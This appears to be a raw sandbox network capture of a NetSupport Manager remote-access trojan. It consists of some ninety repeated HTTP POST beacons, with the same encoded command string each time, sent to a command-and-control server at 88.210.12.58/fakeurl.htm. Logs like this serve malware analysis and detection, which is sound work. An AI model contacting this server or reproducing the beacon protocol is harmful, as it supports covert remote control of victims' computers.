Dec 10, 2024 09:00:42.658128023 CET	230	OUT	POST http://88.210.12.58/fakeurl.htm HTTP/1.1User-Agent: NetSupport Manager/1.3Content-Type: application/x-www-form-urlencodedContent-Length: 36Host: 88.210.12.58Connection: Keep-AliveCMD=ENCDES=1DATA=#mHUAAg Data Raw: Data Ascii:
Dec 10, 2024 09:00:42.759092093 CET	230	OUT	POST http://88.210.12.58/fakeurl.htm HTTP/1.1User-Agent: NetSupport Manager/1.3Content-Type: application/x-www-form-urlencodedContent-Length: 36Host: 88.210.12.58Connection: Keep-AliveCMD=ENCDES=1DATA=#mHUAAg Data Raw: Data Ascii:
Dec 10, 2024 09:00:42.859090090 CET	230	OUT	POST http://88.210.12.58/fakeurl.htm HTTP/1.1User-Agent: NetSupport Manager/1.3Content-Type: application/x-www-form-urlencodedContent-Length: 36Host: 88.210.12.58Connection: Keep-AliveCMD=ENCDES=1DATA=#mHUAAg Data Raw: Data Ascii:
Dec 10, 2024 09:00:42.959088087 CET	230	OUT	POST http://88.210.12.58/fakeurl.htm HTTP/1.1User-Agent: NetSupport Manager/1.3Content-Type: application/x-www-form-urlencodedContent-Length: 36Host: 88.210.12.58Connection: Keep-AliveCMD=ENCDES=1DATA=#mHUAAg Data Raw: Data Ascii:
Dec 10, 2024 09:00:43.060107946 CET	230	OUT	POST http://88.210.12.58/fakeurl.htm HTTP/1.1User-Agent: NetSupport Manager/1.3Content-Type: application/x-www-form-urlencodedContent-Length: 36Host: 88.210.12.58Connection: Keep-AliveCMD=ENCDES=1DATA=#mHUAAg Data Raw: Data Ascii:
Dec 10, 2024 09:00:43.160820007 CET	230	OUT	POST http://88.210.12.58/fakeurl.htm HTTP/1.1User-Agent: NetSupport Manager/1.3Content-Type: application/x-www-form-urlencodedContent-Length: 36Host: 88.210.12.58Connection: Keep-AliveCMD=ENCDES=1DATA=#mHUAAg Data Raw: Data Ascii:
Dec 10, 2024 09:00:43.261089087 CET	230	OUT	POST http://88.210.12.58/fakeurl.htm HTTP/1.1User-Agent: NetSupport Manager/1.3Content-Type: application/x-www-form-urlencodedContent-Length: 36Host: 88.210.12.58Connection: Keep-AliveCMD=ENCDES=1DATA=#mHUAAg Data Raw: Data Ascii:
Dec 10, 2024 09:00:43.364829063 CET	230	OUT	POST http://88.210.12.58/fakeurl.htm HTTP/1.1User-Agent: NetSupport Manager/1.3Content-Type: application/x-www-form-urlencodedContent-Length: 36Host: 88.210.12.58Connection: Keep-AliveCMD=ENCDES=1DATA=#mHUAAg Data Raw: Data Ascii:
Dec 10, 2024 09:00:43.462114096 CET	230	OUT	POST http://88.210.12.58/fakeurl.htm HTTP/1.1User-Agent: NetSupport Manager/1.3Content-Type: application/x-www-form-urlencodedContent-Length: 36Host: 88.210.12.58Connection: Keep-AliveCMD=ENCDES=1DATA=#mHUAAg Data Raw: Data Ascii:
Dec 10, 2024 09:00:43.562096119 CET	230	OUT	POST http://88.210.12.58/fakeurl.htm HTTP/1.1User-Agent: NetSupport Manager/1.3Content-Type: application/x-www-form-urlencodedContent-Length: 36Host: 88.210.12.58Connection: Keep-AliveCMD=ENCDES=1DATA=#mHUAAg Data Raw: Data Ascii:
Dec 10, 2024 09:00:43.664836884 CET	230	OUT	POST http://88.210.12.58/fakeurl.htm HTTP/1.1User-Agent: NetSupport Manager/1.3Content-Type: application/x-www-form-urlencodedContent-Length: 36Host: 88.210.12.58Connection: Keep-AliveCMD=ENCDES=1DATA=#mHUAAg Data Raw: Data Ascii:
Dec 10, 2024 09:00:43.764190912 CET	230	OUT	POST http://88.210.12.58/fakeurl.htm HTTP/1.1User-Agent: NetSupport Manager/1.3Content-Type: application/x-www-form-urlencodedContent-Length: 36Host: 88.210.12.58Connection: Keep-AliveCMD=ENCDES=1DATA=#mHUAAg Data Raw: Data Ascii:
Dec 10, 2024 09:00:43.864835024 CET	230	OUT	POST http://88.210.12.58/fakeurl.htm HTTP/1.1User-Agent: NetSupport Manager/1.3Content-Type: application/x-www-form-urlencodedContent-Length: 36Host: 88.210.12.58Connection: Keep-AliveCMD=ENCDES=1DATA=#mHUAAg Data Raw: Data Ascii:
Dec 10, 2024 09:00:43.964154005 CET	230	OUT	POST http://88.210.12.58/fakeurl.htm HTTP/1.1User-Agent: NetSupport Manager/1.3Content-Type: application/x-www-form-urlencodedContent-Length: 36Host: 88.210.12.58Connection: Keep-AliveCMD=ENCDES=1DATA=#mHUAAg Data Raw: Data Ascii:
Dec 10, 2024 09:00:44.064137936 CET	230	OUT	POST http://88.210.12.58/fakeurl.htm HTTP/1.1User-Agent: NetSupport Manager/1.3Content-Type: application/x-www-form-urlencodedContent-Length: 36Host: 88.210.12.58Connection: Keep-AliveCMD=ENCDES=1DATA=#mHUAAg Data Raw: Data Ascii:
Dec 10, 2024 09:00:44.165146112 CET	230	OUT	POST http://88.210.12.58/fakeurl.htm HTTP/1.1User-Agent: NetSupport Manager/1.3Content-Type: application/x-www-form-urlencodedContent-Length: 36Host: 88.210.12.58Connection: Keep-AliveCMD=ENCDES=1DATA=#mHUAAg Data Raw: Data Ascii:
Dec 10, 2024 09:00:44.265219927 CET	230	OUT	POST http://88.210.12.58/fakeurl.htm HTTP/1.1User-Agent: NetSupport Manager/1.3Content-Type: application/x-www-form-urlencodedContent-Length: 36Host: 88.210.12.58Connection: Keep-AliveCMD=ENCDES=1DATA=#mHUAAg Data Raw: Data Ascii:
Dec 10, 2024 09:00:44.365194082 CET	230	OUT	POST http://88.210.12.58/fakeurl.htm HTTP/1.1User-Agent: NetSupport Manager/1.3Content-Type: application/x-www-form-urlencodedContent-Length: 36Host: 88.210.12.58Connection: Keep-AliveCMD=ENCDES=1DATA=#mHUAAg Data Raw: Data Ascii:
Dec 10, 2024 09:00:44.566389084 CET	230	OUT	POST http://88.210.12.58/fakeurl.htm HTTP/1.1User-Agent: NetSupport Manager/1.3Content-Type: application/x-www-form-urlencodedContent-Length: 36Host: 88.210.12.58Connection: Keep-AliveCMD=ENCDES=1DATA=#mHUAAg Data Raw: Data Ascii:
Dec 10, 2024 09:00:44.770092010 CET	230	OUT	POST http://88.210.12.58/fakeurl.htm HTTP/1.1User-Agent: NetSupport Manager/1.3Content-Type: application/x-www-form-urlencodedContent-Length: 36Host: 88.210.12.58Connection: Keep-AliveCMD=ENCDES=1DATA=#mHUAAg Data Raw: Data Ascii:
Dec 10, 2024 09:00:45.074131012 CET	230	OUT	POST http://88.210.12.58/fakeurl.htm HTTP/1.1User-Agent: NetSupport Manager/1.3Content-Type: application/x-www-form-urlencodedContent-Length: 36Host: 88.210.12.58Connection: Keep-AliveCMD=ENCDES=1DATA=#mHUAAg Data Raw: Data Ascii:
Dec 10, 2024 09:00:45.175122023 CET	230	OUT	POST http://88.210.12.58/fakeurl.htm HTTP/1.1User-Agent: NetSupport Manager/1.3Content-Type: application/x-www-form-urlencodedContent-Length: 36Host: 88.210.12.58Connection: Keep-AliveCMD=ENCDES=1DATA=#mHUAAg Data Raw: Data Ascii:
Dec 10, 2024 09:00:45.276119947 CET	230	OUT	POST http://88.210.12.58/fakeurl.htm HTTP/1.1User-Agent: NetSupport Manager/1.3Content-Type: application/x-www-form-urlencodedContent-Length: 36Host: 88.210.12.58Connection: Keep-AliveCMD=ENCDES=1DATA=#mHUAAg Data Raw: Data Ascii:
Dec 10, 2024 09:00:45.376852989 CET	230	OUT	POST http://88.210.12.58/fakeurl.htm HTTP/1.1User-Agent: NetSupport Manager/1.3Content-Type: application/x-www-form-urlencodedContent-Length: 36Host: 88.210.12.58Connection: Keep-AliveCMD=ENCDES=1DATA=#mHUAAg Data Raw: Data Ascii:
Dec 10, 2024 09:00:45.480844975 CET	230	OUT	POST http://88.210.12.58/fakeurl.htm HTTP/1.1User-Agent: NetSupport Manager/1.3Content-Type: application/x-www-form-urlencodedContent-Length: 36Host: 88.210.12.58Connection: Keep-AliveCMD=ENCDES=1DATA=#mHUAAg Data Raw: Data Ascii:
Dec 10, 2024 09:00:45.577143908 CET	230	OUT	POST http://88.210.12.58/fakeurl.htm HTTP/1.1User-Agent: NetSupport Manager/1.3Content-Type: application/x-www-form-urlencodedContent-Length: 36Host: 88.210.12.58Connection: Keep-AliveCMD=ENCDES=1DATA=#mHUAAg Data Raw: Data Ascii:
Dec 10, 2024 09:00:45.677195072 CET	230	OUT	POST http://88.210.12.58/fakeurl.htm HTTP/1.1User-Agent: NetSupport Manager/1.3Content-Type: application/x-www-form-urlencodedContent-Length: 36Host: 88.210.12.58Connection: Keep-AliveCMD=ENCDES=1DATA=#mHUAAg Data Raw: Data Ascii:
Dec 10, 2024 09:00:45.777132988 CET	230	OUT	POST http://88.210.12.58/fakeurl.htm HTTP/1.1User-Agent: NetSupport Manager/1.3Content-Type: application/x-www-form-urlencodedContent-Length: 36Host: 88.210.12.58Connection: Keep-AliveCMD=ENCDES=1DATA=#mHUAAg Data Raw: Data Ascii:
Dec 10, 2024 09:00:45.880878925 CET	230	OUT	POST http://88.210.12.58/fakeurl.htm HTTP/1.1User-Agent: NetSupport Manager/1.3Content-Type: application/x-www-form-urlencodedContent-Length: 36Host: 88.210.12.58Connection: Keep-AliveCMD=ENCDES=1DATA=#mHUAAg Data Raw: Data Ascii:
Dec 10, 2024 09:00:45.978130102 CET	230	OUT	POST http://88.210.12.58/fakeurl.htm HTTP/1.1User-Agent: NetSupport Manager/1.3Content-Type: application/x-www-form-urlencodedContent-Length: 36Host: 88.210.12.58Connection: Keep-AliveCMD=ENCDES=1DATA=#mHUAAg Data Raw: Data Ascii:
Dec 10, 2024 09:00:46.079129934 CET	230	OUT	POST http://88.210.12.58/fakeurl.htm HTTP/1.1User-Agent: NetSupport Manager/1.3Content-Type: application/x-www-form-urlencodedContent-Length: 36Host: 88.210.12.58Connection: Keep-AliveCMD=ENCDES=1DATA=#mHUAAg Data Raw: Data Ascii:
Dec 10, 2024 09:00:46.179210901 CET	230	OUT	POST http://88.210.12.58/fakeurl.htm HTTP/1.1User-Agent: NetSupport Manager/1.3Content-Type: application/x-www-form-urlencodedContent-Length: 36Host: 88.210.12.58Connection: Keep-AliveCMD=ENCDES=1DATA=#mHUAAg Data Raw: Data Ascii:
Dec 10, 2024 09:00:46.279180050 CET	230	OUT	POST http://88.210.12.58/fakeurl.htm HTTP/1.1User-Agent: NetSupport Manager/1.3Content-Type: application/x-www-form-urlencodedContent-Length: 36Host: 88.210.12.58Connection: Keep-AliveCMD=ENCDES=1DATA=#mHUAAg Data Raw: Data Ascii:
Dec 10, 2024 09:00:46.380170107 CET	230	OUT	POST http://88.210.12.58/fakeurl.htm HTTP/1.1User-Agent: NetSupport Manager/1.3Content-Type: application/x-www-form-urlencodedContent-Length: 36Host: 88.210.12.58Connection: Keep-AliveCMD=ENCDES=1DATA=#mHUAAg Data Raw: Data Ascii:
Dec 10, 2024 09:00:46.481224060 CET	230	OUT	POST http://88.210.12.58/fakeurl.htm HTTP/1.1User-Agent: NetSupport Manager/1.3Content-Type: application/x-www-form-urlencodedContent-Length: 36Host: 88.210.12.58Connection: Keep-AliveCMD=ENCDES=1DATA=#mHUAAg Data Raw: Data Ascii:
Dec 10, 2024 09:00:46.581171036 CET	230	OUT	POST http://88.210.12.58/fakeurl.htm HTTP/1.1User-Agent: NetSupport Manager/1.3Content-Type: application/x-www-form-urlencodedContent-Length: 36Host: 88.210.12.58Connection: Keep-AliveCMD=ENCDES=1DATA=#mHUAAg Data Raw: Data Ascii:
Dec 10, 2024 09:00:46.681196928 CET	230	OUT	POST http://88.210.12.58/fakeurl.htm HTTP/1.1User-Agent: NetSupport Manager/1.3Content-Type: application/x-www-form-urlencodedContent-Length: 36Host: 88.210.12.58Connection: Keep-AliveCMD=ENCDES=1DATA=#mHUAAg Data Raw: Data Ascii:
Dec 10, 2024 09:00:46.782150030 CET	230	OUT	POST http://88.210.12.58/fakeurl.htm HTTP/1.1User-Agent: NetSupport Manager/1.3Content-Type: application/x-www-form-urlencodedContent-Length: 36Host: 88.210.12.58Connection: Keep-AliveCMD=ENCDES=1DATA=#mHUAAg Data Raw: Data Ascii:
Dec 10, 2024 09:00:46.882206917 CET	230	OUT	POST http://88.210.12.58/fakeurl.htm HTTP/1.1User-Agent: NetSupport Manager/1.3Content-Type: application/x-www-form-urlencodedContent-Length: 36Host: 88.210.12.58Connection: Keep-AliveCMD=ENCDES=1DATA=#mHUAAg Data Raw: Data Ascii:
Dec 10, 2024 09:00:46.983155966 CET	230	OUT	POST http://88.210.12.58/fakeurl.htm HTTP/1.1User-Agent: NetSupport Manager/1.3Content-Type: application/x-www-form-urlencodedContent-Length: 36Host: 88.210.12.58Connection: Keep-AliveCMD=ENCDES=1DATA=#mHUAAg Data Raw: Data Ascii:
Dec 10, 2024 09:00:47.088882923 CET	230	OUT	POST http://88.210.12.58/fakeurl.htm HTTP/1.1User-Agent: NetSupport Manager/1.3Content-Type: application/x-www-form-urlencodedContent-Length: 36Host: 88.210.12.58Connection: Keep-AliveCMD=ENCDES=1DATA=#mHUAAg Data Raw: Data Ascii:
Dec 10, 2024 09:00:47.183161974 CET	230	OUT	POST http://88.210.12.58/fakeurl.htm HTTP/1.1User-Agent: NetSupport Manager/1.3Content-Type: application/x-www-form-urlencodedContent-Length: 36Host: 88.210.12.58Connection: Keep-AliveCMD=ENCDES=1DATA=#mHUAAg Data Raw: Data Ascii:
Dec 10, 2024 09:00:47.284168959 CET	230	OUT	POST http://88.210.12.58/fakeurl.htm HTTP/1.1User-Agent: NetSupport Manager/1.3Content-Type: application/x-www-form-urlencodedContent-Length: 36Host: 88.210.12.58Connection: Keep-AliveCMD=ENCDES=1DATA=#mHUAAg Data Raw: Data Ascii:
Dec 10, 2024 09:00:47.388884068 CET	230	OUT	POST http://88.210.12.58/fakeurl.htm HTTP/1.1User-Agent: NetSupport Manager/1.3Content-Type: application/x-www-form-urlencodedContent-Length: 36Host: 88.210.12.58Connection: Keep-AliveCMD=ENCDES=1DATA=#mHUAAg Data Raw: Data Ascii:
Dec 10, 2024 09:00:47.491058111 CET	230	OUT	POST http://88.210.12.58/fakeurl.htm HTTP/1.1User-Agent: NetSupport Manager/1.3Content-Type: application/x-www-form-urlencodedContent-Length: 36Host: 88.210.12.58Connection: Keep-AliveCMD=ENCDES=1DATA=#mHUAAg Data Raw: Data Ascii:
Dec 10, 2024 09:00:48.001266003 CET	230	OUT	POST http://88.210.12.58/fakeurl.htm HTTP/1.1User-Agent: NetSupport Manager/1.3Content-Type: application/x-www-form-urlencodedContent-Length: 36Host: 88.210.12.58Connection: Keep-AliveCMD=ENCDES=1DATA=#mHUAAg Data Raw: Data Ascii:
Dec 10, 2024 09:00:48.102173090 CET	230	OUT	POST http://88.210.12.58/fakeurl.htm HTTP/1.1User-Agent: NetSupport Manager/1.3Content-Type: application/x-www-form-urlencodedContent-Length: 36Host: 88.210.12.58Connection: Keep-AliveCMD=ENCDES=1DATA=#mHUAAg Data Raw: Data Ascii:
Dec 10, 2024 09:00:48.203205109 CET	230	OUT	POST http://88.210.12.58/fakeurl.htm HTTP/1.1User-Agent: NetSupport Manager/1.3Content-Type: application/x-www-form-urlencodedContent-Length: 36Host: 88.210.12.58Connection: Keep-AliveCMD=ENCDES=1DATA=#mHUAAg Data Raw: Data Ascii:
Dec 10, 2024 09:00:48.304178953 CET	230	OUT	POST http://88.210.12.58/fakeurl.htm HTTP/1.1User-Agent: NetSupport Manager/1.3Content-Type: application/x-www-form-urlencodedContent-Length: 36Host: 88.210.12.58Connection: Keep-AliveCMD=ENCDES=1DATA=#mHUAAg Data Raw: Data Ascii:
Dec 10, 2024 09:00:48.405165911 CET	230	OUT	POST http://88.210.12.58/fakeurl.htm HTTP/1.1User-Agent: NetSupport Manager/1.3Content-Type: application/x-www-form-urlencodedContent-Length: 36Host: 88.210.12.58Connection: Keep-AliveCMD=ENCDES=1DATA=#mHUAAg Data Raw: Data Ascii:
Dec 10, 2024 09:00:48.505146980 CET	230	OUT	POST http://88.210.12.58/fakeurl.htm HTTP/1.1User-Agent: NetSupport Manager/1.3Content-Type: application/x-www-form-urlencodedContent-Length: 36Host: 88.210.12.58Connection: Keep-AliveCMD=ENCDES=1DATA=#mHUAAg Data Raw: Data Ascii:
Dec 10, 2024 09:00:48.605150938 CET	230	OUT	POST http://88.210.12.58/fakeurl.htm HTTP/1.1User-Agent: NetSupport Manager/1.3Content-Type: application/x-www-form-urlencodedContent-Length: 36Host: 88.210.12.58Connection: Keep-AliveCMD=ENCDES=1DATA=#mHUAAg Data Raw: Data Ascii:
Dec 10, 2024 09:00:48.706298113 CET	230	OUT	POST http://88.210.12.58/fakeurl.htm HTTP/1.1User-Agent: NetSupport Manager/1.3Content-Type: application/x-www-form-urlencodedContent-Length: 36Host: 88.210.12.58Connection: Keep-AliveCMD=ENCDES=1DATA=#mHUAAg Data Raw: Data Ascii:
Dec 10, 2024 09:00:48.806346893 CET	230	OUT	POST http://88.210.12.58/fakeurl.htm HTTP/1.1User-Agent: NetSupport Manager/1.3Content-Type: application/x-www-form-urlencodedContent-Length: 36Host: 88.210.12.58Connection: Keep-AliveCMD=ENCDES=1DATA=#mHUAAg Data Raw: Data Ascii:
Dec 10, 2024 09:00:48.906189919 CET	230	OUT	POST http://88.210.12.58/fakeurl.htm HTTP/1.1User-Agent: NetSupport Manager/1.3Content-Type: application/x-www-form-urlencodedContent-Length: 36Host: 88.210.12.58Connection: Keep-AliveCMD=ENCDES=1DATA=#mHUAAg Data Raw: Data Ascii:
Dec 10, 2024 09:00:49.007217884 CET	230	OUT	POST http://88.210.12.58/fakeurl.htm HTTP/1.1User-Agent: NetSupport Manager/1.3Content-Type: application/x-www-form-urlencodedContent-Length: 36Host: 88.210.12.58Connection: Keep-AliveCMD=ENCDES=1DATA=#mHUAAg Data Raw: Data Ascii:
Dec 10, 2024 09:00:49.108897924 CET	230	OUT	POST http://88.210.12.58/fakeurl.htm HTTP/1.1User-Agent: NetSupport Manager/1.3Content-Type: application/x-www-form-urlencodedContent-Length: 36Host: 88.210.12.58Connection: Keep-AliveCMD=ENCDES=1DATA=#mHUAAg Data Raw: Data Ascii:
Dec 10, 2024 09:00:49.209201097 CET	230	OUT	POST http://88.210.12.58/fakeurl.htm HTTP/1.1User-Agent: NetSupport Manager/1.3Content-Type: application/x-www-form-urlencodedContent-Length: 36Host: 88.210.12.58Connection: Keep-AliveCMD=ENCDES=1DATA=#mHUAAg Data Raw: Data Ascii:
Dec 10, 2024 09:00:49.309170008 CET	230	OUT	POST http://88.210.12.58/fakeurl.htm HTTP/1.1User-Agent: NetSupport Manager/1.3Content-Type: application/x-www-form-urlencodedContent-Length: 36Host: 88.210.12.58Connection: Keep-AliveCMD=ENCDES=1DATA=#mHUAAg Data Raw: Data Ascii:
Dec 10, 2024 09:00:49.412904978 CET	230	OUT	POST http://88.210.12.58/fakeurl.htm HTTP/1.1User-Agent: NetSupport Manager/1.3Content-Type: application/x-www-form-urlencodedContent-Length: 36Host: 88.210.12.58Connection: Keep-AliveCMD=ENCDES=1DATA=#mHUAAg Data Raw: Data Ascii:
Dec 10, 2024 09:00:49.512900114 CET	230	OUT	POST http://88.210.12.58/fakeurl.htm HTTP/1.1User-Agent: NetSupport Manager/1.3Content-Type: application/x-www-form-urlencodedContent-Length: 36Host: 88.210.12.58Connection: Keep-AliveCMD=ENCDES=1DATA=#mHUAAg Data Raw: Data Ascii:
Dec 10, 2024 09:00:49.612903118 CET	230	OUT	POST http://88.210.12.58/fakeurl.htm HTTP/1.1User-Agent: NetSupport Manager/1.3Content-Type: application/x-www-form-urlencodedContent-Length: 36Host: 88.210.12.58Connection: Keep-AliveCMD=ENCDES=1DATA=#mHUAAg Data Raw: Data Ascii:
Dec 10, 2024 09:00:49.711174965 CET	230	OUT	POST http://88.210.12.58/fakeurl.htm HTTP/1.1User-Agent: NetSupport Manager/1.3Content-Type: application/x-www-form-urlencodedContent-Length: 36Host: 88.210.12.58Connection: Keep-AliveCMD=ENCDES=1DATA=#mHUAAg Data Raw: Data Ascii:
Dec 10, 2024 09:00:49.812908888 CET	230	OUT	POST http://88.210.12.58/fakeurl.htm HTTP/1.1User-Agent: NetSupport Manager/1.3Content-Type: application/x-www-form-urlencodedContent-Length: 36Host: 88.210.12.58Connection: Keep-AliveCMD=ENCDES=1DATA=#mHUAAg Data Raw: Data Ascii:
Dec 10, 2024 09:00:49.911196947 CET	230	OUT	POST http://88.210.12.58/fakeurl.htm HTTP/1.1User-Agent: NetSupport Manager/1.3Content-Type: application/x-www-form-urlencodedContent-Length: 36Host: 88.210.12.58Connection: Keep-AliveCMD=ENCDES=1DATA=#mHUAAg Data Raw: Data Ascii:
Dec 10, 2024 09:00:50.012681961 CET	230	OUT	POST http://88.210.12.58/fakeurl.htm HTTP/1.1User-Agent: NetSupport Manager/1.3Content-Type: application/x-www-form-urlencodedContent-Length: 36Host: 88.210.12.58Connection: Keep-AliveCMD=ENCDES=1DATA=#mHUAAg Data Raw: Data Ascii:
Dec 10, 2024 09:00:50.113219976 CET	230	OUT	POST http://88.210.12.58/fakeurl.htm HTTP/1.1User-Agent: NetSupport Manager/1.3Content-Type: application/x-www-form-urlencodedContent-Length: 36Host: 88.210.12.58Connection: Keep-AliveCMD=ENCDES=1DATA=#mHUAAg Data Raw: Data Ascii:
Dec 10, 2024 09:00:50.214220047 CET	230	OUT	POST http://88.210.12.58/fakeurl.htm HTTP/1.1User-Agent: NetSupport Manager/1.3Content-Type: application/x-www-form-urlencodedContent-Length: 36Host: 88.210.12.58Connection: Keep-AliveCMD=ENCDES=1DATA=#mHUAAg Data Raw: Data Ascii:
Dec 10, 2024 09:00:50.315237999 CET	230	OUT	POST http://88.210.12.58/fakeurl.htm HTTP/1.1User-Agent: NetSupport Manager/1.3Content-Type: application/x-www-form-urlencodedContent-Length: 36Host: 88.210.12.58Connection: Keep-AliveCMD=ENCDES=1DATA=#mHUAAg Data Raw: Data Ascii:
Dec 10, 2024 09:00:50.416284084 CET	230	OUT	POST http://88.210.12.58/fakeurl.htm HTTP/1.1User-Agent: NetSupport Manager/1.3Content-Type: application/x-www-form-urlencodedContent-Length: 36Host: 88.210.12.58Connection: Keep-AliveCMD=ENCDES=1DATA=#mHUAAg Data Raw: Data Ascii:
Dec 10, 2024 09:00:50.516238928 CET	230	OUT	POST http://88.210.12.58/fakeurl.htm HTTP/1.1User-Agent: NetSupport Manager/1.3Content-Type: application/x-www-form-urlencodedContent-Length: 36Host: 88.210.12.58Connection: Keep-AliveCMD=ENCDES=1DATA=#mHUAAg Data Raw: Data Ascii:
Dec 10, 2024 09:00:50.617213011 CET	230	OUT	POST http://88.210.12.58/fakeurl.htm HTTP/1.1User-Agent: NetSupport Manager/1.3Content-Type: application/x-www-form-urlencodedContent-Length: 36Host: 88.210.12.58Connection: Keep-AliveCMD=ENCDES=1DATA=#mHUAAg Data Raw: Data Ascii:
Dec 10, 2024 09:00:50.717207909 CET	230	OUT	POST http://88.210.12.58/fakeurl.htm HTTP/1.1User-Agent: NetSupport Manager/1.3Content-Type: application/x-www-form-urlencodedContent-Length: 36Host: 88.210.12.58Connection: Keep-AliveCMD=ENCDES=1DATA=#mHUAAg Data Raw: Data Ascii:
Dec 10, 2024 09:00:50.818242073 CET	230	OUT	POST http://88.210.12.58/fakeurl.htm HTTP/1.1User-Agent: NetSupport Manager/1.3Content-Type: application/x-www-form-urlencodedContent-Length: 36Host: 88.210.12.58Connection: Keep-AliveCMD=ENCDES=1DATA=#mHUAAg Data Raw: Data Ascii:
Dec 10, 2024 09:00:50.918222904 CET	230	OUT	POST http://88.210.12.58/fakeurl.htm HTTP/1.1User-Agent: NetSupport Manager/1.3Content-Type: application/x-www-form-urlencodedContent-Length: 36Host: 88.210.12.58Connection: Keep-AliveCMD=ENCDES=1DATA=#mHUAAg Data Raw: Data Ascii:
Dec 10, 2024 09:00:51.019208908 CET	230	OUT	POST http://88.210.12.58/fakeurl.htm HTTP/1.1User-Agent: NetSupport Manager/1.3Content-Type: application/x-www-form-urlencodedContent-Length: 36Host: 88.210.12.58Connection: Keep-AliveCMD=ENCDES=1DATA=#mHUAAg Data Raw: Data Ascii:
Dec 10, 2024 09:00:51.120975018 CET	230	OUT	POST http://88.210.12.58/fakeurl.htm HTTP/1.1User-Agent: NetSupport Manager/1.3Content-Type: application/x-www-form-urlencodedContent-Length: 36Host: 88.210.12.58Connection: Keep-AliveCMD=ENCDES=1DATA=#mHUAAg Data Raw: Data Ascii:
Dec 10, 2024 09:00:51.220932961 CET	230	OUT	POST http://88.210.12.58/fakeurl.htm HTTP/1.1User-Agent: NetSupport Manager/1.3Content-Type: application/x-www-form-urlencodedContent-Length: 36Host: 88.210.12.58Connection: Keep-AliveCMD=ENCDES=1DATA=#mHUAAg Data Raw: Data Ascii:
Dec 10, 2024 09:00:51.320281982 CET	230	OUT	POST http://88.210.12.58/fakeurl.htm HTTP/1.1User-Agent: NetSupport Manager/1.3Content-Type: application/x-www-form-urlencodedContent-Length: 36Host: 88.210.12.58Connection: Keep-AliveCMD=ENCDES=1DATA=#mHUAAg Data Raw: Data Ascii:
Dec 10, 2024 09:00:51.421197891 CET	230	OUT	POST http://88.210.12.58/fakeurl.htm HTTP/1.1User-Agent: NetSupport Manager/1.3Content-Type: application/x-www-form-urlencodedContent-Length: 36Host: 88.210.12.58Connection: Keep-AliveCMD=ENCDES=1DATA=#mHUAAg Data Raw: Data Ascii:
Dec 10, 2024 09:00:51.521326065 CET	230	OUT	POST http://88.210.12.58/fakeurl.htm HTTP/1.1User-Agent: NetSupport Manager/1.3Content-Type: application/x-www-form-urlencodedContent-Length: 36Host: 88.210.12.58Connection: Keep-AliveCMD=ENCDES=1DATA=#mHUAAg Data Raw: Data Ascii:
Dec 10, 2024 09:00:51.624922037 CET	230	OUT	POST http://88.210.12.58/fakeurl.htm HTTP/1.1User-Agent: NetSupport Manager/1.3Content-Type: application/x-www-form-urlencodedContent-Length: 36Host: 88.210.12.58Connection: Keep-AliveCMD=ENCDES=1DATA=#mHUAAg Data Raw: Data Ascii:
Dec 10, 2024 09:00:51.723192930 CET	230	OUT	POST http://88.210.12.58/fakeurl.htm HTTP/1.1User-Agent: NetSupport Manager/1.3Content-Type: application/x-www-form-urlencodedContent-Length: 36Host: 88.210.12.58Connection: Keep-AliveCMD=ENCDES=1DATA=#mHUAAg Data Raw: Data Ascii:
Dec 10, 2024 09:00:51.824929953 CET	230	OUT	POST http://88.210.12.58/fakeurl.htm HTTP/1.1User-Agent: NetSupport Manager/1.3Content-Type: application/x-www-form-urlencodedContent-Length: 36Host: 88.210.12.58Connection: Keep-AliveCMD=ENCDES=1DATA=#mHUAAg Data Raw: Data Ascii:
Dec 10, 2024 09:00:51.924931049 CET	230	OUT	POST http://88.210.12.58/fakeurl.htm HTTP/1.1User-Agent: NetSupport Manager/1.3Content-Type: application/x-www-form-urlencodedContent-Length: 36Host: 88.210.12.58Connection: Keep-AliveCMD=ENCDES=1DATA=#mHUAAg Data Raw: Data Ascii:
Dec 10, 2024 09:00:52.024228096 CET	230	OUT	POST http://88.210.12.58/fakeurl.htm HTTP/1.1User-Agent: NetSupport Manager/1.3Content-Type: application/x-www-form-urlencodedContent-Length: 36Host: 88.210.12.58Connection: Keep-AliveCMD=ENCDES=1DATA=#mHUAAg Data Raw: Data Ascii:
Dec 10, 2024 09:00:52.125236034 CET	230	OUT	POST http://88.210.12.58/fakeurl.htm HTTP/1.1User-Agent: NetSupport Manager/1.3Content-Type: application/x-www-form-urlencodedContent-Length: 36Host: 88.210.12.58Connection: Keep-AliveCMD=ENCDES=1DATA=#mHUAAg Data Raw: Data Ascii:
Dec 10, 2024 09:00:52.225294113 CET	230	OUT	POST http://88.210.12.58/fakeurl.htm HTTP/1.1User-Agent: NetSupport Manager/1.3Content-Type: application/x-www-form-urlencodedContent-Length: 36Host: 88.210.12.58Connection: Keep-AliveCMD=ENCDES=1DATA=#mHUAAg Data Raw: Data Ascii:
Dec 10, 2024 09:00:52.326258898 CET	230	OUT	POST http://88.210.12.58/fakeurl.htm HTTP/1.1User-Agent: NetSupport Manager/1.3Content-Type: application/x-www-form-urlencodedContent-Length: 36Host: 88.210.12.58Connection: Keep-AliveCMD=ENCDES=1DATA=#mHUAAg Data Raw: Data Ascii:
Dec 10, 2024 09:00:52.426232100 CET	230	OUT	POST http://88.210.12.58/fakeurl.htm HTTP/1.1User-Agent: NetSupport Manager/1.3Content-Type: application/x-www-form-urlencodedContent-Length: 36Host: 88.210.12.58Connection: Keep-AliveCMD=ENCDES=1DATA=#mHUAAg Data Raw: Data Ascii:
Dec 10, 2024 09:00:52.526212931 CET	230	OUT	POST http://88.210.12.58/fakeurl.htm HTTP/1.1User-Agent: NetSupport Manager/1.3Content-Type: application/x-www-form-urlencodedContent-Length: 36Host: 88.210.12.58Connection: Keep-AliveCMD=ENCDES=1DATA=#mHUAAg Data Raw: Data Ascii:
Dec 10, 2024 09:00:52.627185106 CET	230	OUT	POST http://88.210.12.58/fakeurl.htm HTTP/1.1User-Agent: NetSupport Manager/1.3Content-Type: application/x-www-form-urlencodedContent-Length: 36Host: 88.210.12.58Connection: Keep-AliveCMD=ENCDES=1DATA=#mHUAAg Data Raw: Data Ascii:
Dec 10, 2024 09:00:52.728235960 CET	230	OUT	POST http://88.210.12.58/fakeurl.htm HTTP/1.1User-Agent: NetSupport Manager/1.3Content-Type: application/x-www-form-urlencodedContent-Length: 36Host: 88.210.12.58Connection: Keep-AliveCMD=ENCDES=1DATA=#mHUAAg Data Raw: Data Ascii:
